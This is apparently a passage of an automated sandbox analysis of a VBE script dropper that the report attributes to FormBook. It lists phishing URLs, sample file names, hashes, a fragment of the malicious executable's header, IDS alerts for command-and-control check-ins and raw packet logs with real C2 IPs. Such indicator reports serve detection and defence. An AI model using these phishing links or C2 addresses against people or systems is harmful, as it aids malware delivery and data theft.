                                                                                                                        https://covid19.auth-verify.com/XUXIrOHR6RjhQNXRDVW5iWmFYNTZaZlB0Z1ZnZHBzcVhlTW1qdU04ZXpTUXRDVmJVWGZzaSsxd05aQUF3emJmeFZyVkhKN3RPM2cwU3NDMWkrMFhSbTcwSEh5N09lN256QnJjRG9sWklQRy9KZm14M1JhMER1NzVYVjFlZUxmeTZnQVc4Z0t1T2pTTnJ5dHN3NVNSTFljQzlxOFJRb2NraUtMVVZ4ckN0eVF1WTFCS3VqVnNZazlaSlUrK3ZjUE1PcVM1eFhrQT0tLUs1UUpQQ3gzcDZ1VzRKVVEtLW44eGZTZUNwWmFkTnlqMFJCODNDZUE9PQ==?cid=289532680Get hashmaliciousKnowBe4Browse
                                                                                                                        • 52.209.169.238
                                                                                                                        https://shadowline-hub-uk-limited.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 3.255.10.234
                                                                                                                        https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.226.2.116
                                                                                                                        https://online.flippingbook.com/view/946261857/Get hashmaliciousUnknownBrowse
                                                                                                                        • 108.158.71.173
                                                                                                                        HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 3.111.160.216
                                                                                                                        BODIS-NJUSCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.243.205
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.243.205
                                                                                                                        BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        No context
                                                                                                                        No context
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe
                                                                                                                        File Type:CSV text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):226
                                                                                                                        Entropy (8bit):5.360398796477698
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                        Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):196608
                                                                                                                        Entropy (8bit):1.1209935793793442
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                                        MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                                        SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                                        SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                                        SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):793088
                                                                                                                        Entropy (8bit):4.114205311523398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:Iqov5BYW3kUYf3hScA06fsXcTqmrj/uBk8dV9gajhyDTKk6NJNFIPxAZTWSEnqO4:RadYsbmP+QFEY7mIW
                                                                                                                        MD5:36972AB0B73F25F92B42448D6FAAEA58
                                                                                                                        SHA1:18782056DF033E6602800453FDE691CDD15262F9
                                                                                                                        SHA-256:EA2416415A1453F3431F33B2CBAD63D8496F7C4450C021BE197E52D8E23FE84E
                                                                                                                        SHA-512:B035957F5A6DBE31978670E618A6DBFA461B864971E1A0429FEE7DFB17330A3D19FC29F0649F08888488CF8FBA51E48F0CC18E0AF0FD0F654AD77326D1F76861
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..........."...0............../... ...@....@.. ....................................`.....................................O....@.......................`......|...8............................................ ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H........(..............................................................".(.....*".(8....*.*.r ..p.....*^..}.....(M......(&....*..*f..sN...}.....rB..p(O....*..(P...*....0..t.............(....r...p......%..!...(.....o......,'r/..p........%.r3..p.o....o....,..(...........s....s....%.o ....o!...+.*.0..f........u$.....-........s....s.......o ....("...o!... ....(#...($...-.(%...,..(.....o&...-..(.... ....(#...+....0..4........r]..p('....r...p('....r...p....(....o(......()....*.0..
                                                                                                                        File type:ASCII text, with very long lines (64867), with CRLF line terminators
                                                                                                                        Entropy (8bit):3.7101642709172955
                                                                                                                        TrID:
                                                                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                                                                        File name:DOC_114542366.vbe
                                                                                                                        File size:1'712'053 bytes
                                                                                                                        MD5:76c9e79512fae43cf3418e7ffd2e6d7e
                                                                                                                        SHA1:83604bad711a92e9ec62a342311c8d3701f75516
                                                                                                                        SHA256:d6efa90d2b7cf0aabc00d25c40b9cef231ab81b055c6b5e47655630bb1cc62bf
                                                                                                                        SHA512:981d53e103297efbca428c2ff41d216af21979d4818605066a2da6aca1bfee05b0fe9d1f4a3aae7b561d1e14526d5063ead985250724c0ba748eef7be7066bb2
                                                                                                                        SSDEEP:24576:tjkxjYmgPzdgQpoaDR5zPYNUgMbHORCOWsIGKA4SLAGIV2RwtZ3AQEyrPvbvGcUW:R
                                                                                                                        TLSH:6B8576032E83231EEE1CD34625BC45649D59CAFF4EB1D0DCD1677DE16812C6E29EBAA0
                                                                                                                        File Content Preview:Option Explicit....' Constants..Const TEMP_DIRECTORY = 2..Const INIT_DELAY = "3000-7000"..Const EXEC_DELAY = "2000-5000"....' Global Variables..Dim tempFilePath, logFilePath, encodedData....' Entry point..Sub Main().. InitializeScriptVariables.. If
                                                                                                                        Icon Hash:68d69b8f86ab9a86
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-11-20T16:54:08.618110+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149791156.251.17.22480TCP
                                                                                                                        2024-11-20T16:54:08.618110+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149791156.251.17.22480TCP
                                                                                                                        2024-11-20T16:54:25.720471+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114982943.163.1.11080TCP
                                                                                                                        2024-11-20T16:54:28.392311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114983843.163.1.11080TCP
                                                                                                                        2024-11-20T16:54:31.064196+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114984443.163.1.11080TCP
                                                                                                                        2024-11-20T16:54:33.844204+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114985143.163.1.11080TCP
                                                                                                                        2024-11-20T16:54:33.844204+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114985143.163.1.11080TCP
                                                                                                                        2024-11-20T16:54:41.382649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114986847.254.140.25580TCP
                                                                                                                        2024-11-20T16:54:44.010751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114987547.254.140.25580TCP
                                                                                                                        2024-11-20T16:54:46.808497+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114988347.254.140.25580TCP
                                                                                                                        2024-11-20T16:54:49.321171+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114988947.254.140.25580TCP
                                                                                                                        2024-11-20T16:54:49.321171+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114988947.254.140.25580TCP
                                                                                                                        2024-11-20T16:54:56.333264+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149905208.91.197.2780TCP
                                                                                                                        2024-11-20T16:54:58.972415+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149912208.91.197.2780TCP
                                                                                                                        2024-11-20T16:55:01.585156+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149919208.91.197.2780TCP
                                                                                                                        2024-11-20T16:55:06.930289+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149925208.91.197.2780TCP
                                                                                                                        2024-11-20T16:55:06.930289+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149925208.91.197.2780TCP
                                                                                                                        2024-11-20T16:55:14.345721+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149948172.67.220.3680TCP
                                                                                                                        2024-11-20T16:55:16.826377+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149954172.67.220.3680TCP
                                                                                                                        2024-11-20T16:55:19.682107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149962172.67.220.3680TCP
                                                                                                                        2024-11-20T16:55:22.299377+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149968172.67.220.3680TCP
                                                                                                                        2024-11-20T16:55:22.299377+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149968172.67.220.3680TCP
                                                                                                                        2024-11-20T16:55:29.630412+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998598.124.224.1780TCP
                                                                                                                        2024-11-20T16:55:32.286267+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114999398.124.224.1780TCP
                                                                                                                        2024-11-20T16:55:34.993761+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114999598.124.224.1780TCP
                                                                                                                        2024-11-20T16:55:37.658446+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114999698.124.224.1780TCP
                                                                                                                        2024-11-20T16:55:37.658446+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114999698.124.224.1780TCP
                                                                                                                        2024-11-20T16:55:44.639345+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149997203.161.43.22880TCP
                                                                                                                        2024-11-20T16:55:47.294594+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149998203.161.43.22880TCP
                                                                                                                        2024-11-20T16:55:50.046306+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149999203.161.43.22880TCP
                                                                                                                        2024-11-20T16:55:52.637402+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150000203.161.43.22880TCP
                                                                                                                        2024-11-20T16:55:52.637402+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150000203.161.43.22880TCP
                                                                                                                        2024-11-20T16:56:00.289916+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150001103.224.182.24280TCP
                                                                                                                        2024-11-20T16:56:02.889986+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150002103.224.182.24280TCP
                                                                                                                        2024-11-20T16:56:05.733561+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150003103.224.182.24280TCP
                                                                                                                        2024-11-20T16:56:08.272690+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150004103.224.182.24280TCP
                                                                                                                        2024-11-20T16:56:08.272690+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150004103.224.182.24280TCP
                                                                                                                        2024-11-20T16:56:15.690310+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150005199.59.243.22780TCP
                                                                                                                        2024-11-20T16:56:18.363418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150006199.59.243.22780TCP
                                                                                                                        2024-11-20T16:56:20.993661+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150007199.59.243.22780TCP
                                                                                                                        2024-11-20T16:56:23.664772+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150008199.59.243.22780TCP
                                                                                                                        2024-11-20T16:56:23.664772+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150008199.59.243.22780TCP
                                                                                                                        2024-11-20T16:56:30.536900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115000913.248.169.4880TCP
                                                                                                                        2024-11-20T16:56:33.246857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001013.248.169.4880TCP
                                                                                                                        2024-11-20T16:56:35.914984+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001113.248.169.4880TCP
                                                                                                                        2024-11-20T16:56:38.575239+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.115001213.248.169.4880TCP
                                                                                                                        2024-11-20T16:56:38.575239+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.115001213.248.169.4880TCP
                                                                                                                        2024-11-20T16:56:45.892604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001338.47.232.19480TCP
                                                                                                                        2024-11-20T16:56:48.564405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001438.47.232.19480TCP
                                                                                                                        2024-11-20T16:56:51.363713+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001538.47.232.19480TCP
                                                                                                                        2024-11-20T16:56:54.133157+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.115001638.47.232.19480TCP
                                                                                                                        2024-11-20T16:56:54.133157+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.115001638.47.232.19480TCP
                                                                                                                        2024-11-20T16:57:00.972633+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150017172.67.159.2480TCP
                                                                                                                        2024-11-20T16:57:03.655325+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150018172.67.159.2480TCP
                                                                                                                        2024-11-20T16:57:06.448068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150019172.67.159.2480TCP
                                                                                                                        2024-11-20T16:57:09.031955+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150020172.67.159.2480TCP
                                                                                                                        2024-11-20T16:57:09.031955+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150020172.67.159.2480TCP
                                                                                                                        2024-11-20T16:57:16.085067+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150021208.91.197.2780TCP
                                                                                                                        2024-11-20T16:57:18.784281+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150022208.91.197.2780TCP
                                                                                                                        2024-11-20T16:57:21.459219+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150023208.91.197.2780TCP
                                                                                                                        2024-11-20T16:57:25.491138+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150024208.91.197.2780TCP
                                                                                                                        2024-11-20T16:57:25.491138+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150024208.91.197.2780TCP
                                                                                                                        2024-11-20T16:57:32.683253+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150025185.27.134.14480TCP
                                                                                                                        2024-11-20T16:57:36.805343+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150026185.27.134.14480TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 20, 2024 16:54:06.912462950 CET4979180192.168.2.11156.251.17.224
                                                                                                                        Nov 20, 2024 16:54:07.038907051 CET8049791156.251.17.224192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:07.039443016 CET4979180192.168.2.11156.251.17.224
                                                                                                                        Nov 20, 2024 16:54:07.050790071 CET4979180192.168.2.11156.251.17.224
                                                                                                                        Nov 20, 2024 16:54:07.173279047 CET8049791156.251.17.224192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:08.617803097 CET8049791156.251.17.224192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:08.618026018 CET8049791156.251.17.224192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:08.618109941 CET4979180192.168.2.11156.251.17.224
                                                                                                                        Nov 20, 2024 16:54:08.621284962 CET4979180192.168.2.11156.251.17.224
                                                                                                                        Nov 20, 2024 16:54:08.740808964 CET8049791156.251.17.224192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:24.078672886 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:24.198209047 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:24.198328018 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:24.213718891 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:24.333458900 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.720470905 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746002913 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746026039 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746134043 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746192932 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746222973 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746330976 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746354103 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746366978 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746380091 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746395111 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746403933 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746433973 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746445894 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.746462107 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746624947 CET804982943.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:25.746673107 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:25.747298002 CET4982980192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:26.740111113 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:26.859957933 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:26.860219955 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:26.878608942 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:27.001358032 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.392311096 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418620110 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418703079 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418751001 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418788910 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418824911 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418826103 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418859959 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418875933 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418875933 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418915033 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418951035 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418957949 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418986082 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.418987036 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.418992996 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.419023991 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.419063091 CET804983843.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:28.419068098 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.419068098 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:28.419126034 CET4983880192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:29.411967039 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:29.532162905 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:29.532558918 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:29.556777954 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:29.679959059 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:29.683877945 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.064196110 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132139921 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132210970 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132247925 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132308006 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132327080 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132348061 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132380962 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132385015 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132421017 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132431030 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132456064 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132464886 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132487059 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132491112 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132509947 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132525921 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.132549047 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.132579088 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:31.225198984 CET804984443.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:31.225285053 CET4984480192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:32.083585978 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:32.204698086 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:32.204905987 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:32.214546919 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:32.335789919 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843769073 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843786001 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843801022 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843872070 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843885899 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843902111 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.843915939 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.844024897 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.844039917 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.844053030 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.844203949 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:33.844393969 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:33.965728998 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.965986967 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:33.966317892 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:33.970087051 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.017234087 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.072880983 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.073101044 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.073431969 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.077224016 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.077377081 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.077491999 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.085639000 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.085836887 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.086106062 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.094527960 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.094861984 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.095002890 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.102636099 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.102750063 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.102895021 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.111177921 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.111263037 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.111394882 CET4985180192.168.2.1143.163.1.110
